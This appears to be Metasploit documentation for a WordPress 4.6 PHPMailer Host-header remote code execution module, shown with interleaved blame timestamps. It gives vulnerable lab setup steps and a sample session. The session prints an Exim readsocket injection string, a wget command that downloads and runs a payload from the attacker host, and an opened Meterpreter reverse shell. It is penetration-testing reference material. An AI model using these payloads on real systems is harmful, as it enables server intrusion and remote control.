2019-09-30 16:58:00 -05:00
## Introduction
2017-05-10 01:09:42 -05:00
This vuln has some caveats: you need approximately WordPress 4.6 with
2017-05-15 14:28:07 -05:00
Exim for the `sendmail(8)` command. You do not need to install
PHPMailer, as it is included as part of the WordPress install.
2017-05-10 01:09:42 -05:00
Thanks to WP's awesome practice of backporting the heck out of all their
patches, we need to use a Git clone and check out the vuln release.
## Setup
2017-05-11 14:13:45 -05:00
This was tested on Ubuntu 15.04. YMMV.
2017-05-10 01:09:42 -05:00
1. got root?
2. `cd /var/www/html`
3. `git clone https://github.com/WordPress/WordPress wordpress-4.6`
4. `chown -R www-data:www-data wordpress-4.6`
5. `cd wordpress-4.6`
6. `git checkout 4.6`
7. Set up a MySQL database for WordPress
8. Install as normal
## Options
**VERBOSE **
If you'd like to see what requests are being sent, set this to `true` .
You should see the Exim prestager commands being sent to the target.
## Usage
```
msf > use exploit/unix/webapp/wp_phpmailer_host_header
2017-05-15 21:28:41 -05:00
msf exploit(wp_phpmailer_host_header) > set rhost 192.168.33.135
rhost => 192.168.33.135
2017-05-10 01:09:42 -05:00
msf exploit(wp_phpmailer_host_header) > set targeturi /wordpress-4.6
targeturi => /wordpress-4.6
2017-05-15 21:28:41 -05:00
msf exploit(wp_phpmailer_host_header) > set lhost 192.168.33.1
2017-05-10 01:09:42 -05:00
lhost => 192.168.33.1
msf exploit(wp_phpmailer_host_header) > set verbose true
verbose => true
msf exploit(wp_phpmailer_host_header) > run
[*] Started HTTPS reverse handler on https://192.168.33.1:8443
2017-05-15 21:28:41 -05:00
[*] WordPress 4.6 installed at http://192.168.33.135/wordpress-4.6
2017-05-10 01:09:42 -05:00
[*] Generating wget command stager
2017-05-16 14:29:57 -05:00
[*] Using URL: http://0.0.0.0:8080/mbpvuuck
[*] Local IP: http://[redacted]:8080/mbpvuuck
2017-05-10 01:09:42 -05:00
[*] Generating and sending Exim prestager
2017-05-16 14:29:57 -05:00
[*] Sending /bin/sh -c ${run{/bin/echo}{${extract{-1}{$value}{${readsocket{inet:192.168.33.1:8080}{get /mbpvuuck http/1.0$value$value}}}}}}
[+] Sending wget${IFS}-qO${IFS}/tmp/vfotastd${IFS}http://192.168.33.1:8080/mbpvuuck;chmod${IFS}+x${IFS}/tmp/vfotastd;/tmp/vfotastd;rm${IFS}-f${IFS}/tmp/vfotastd
2017-05-15 21:28:41 -05:00
[+] Sending payload linux/x64/meterpreter_reverse_https
2017-05-16 14:29:57 -05:00
[*] https://192.168.33.1:8443 handling request from 192.168.33.135; (UUID: xyx88vod) Redirecting stageless connection from /nBwfbdUYNjU2TjBMb1VkagG08CfJO-jZYpOxBsWHQMGHh7p5ISjCG3Ze with UA 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'
[*] https://192.168.33.1:8443 handling request from 192.168.33.135; (UUID: xyx88vod) Attaching orphaned/stageless session...
[*] Meterpreter session 1 opened (192.168.33.1:8443 -> 192.168.33.135:36075) at 2017-05-16 14:25:28 -0500
[*] Sending /bin/rm -f /tmp/vfotastd
2017-05-10 01:09:42 -05:00
[*] Server stopped.
2017-05-16 14:29:57 -05:00
meterpreter >
2017-05-10 01:09:42 -05:00
```
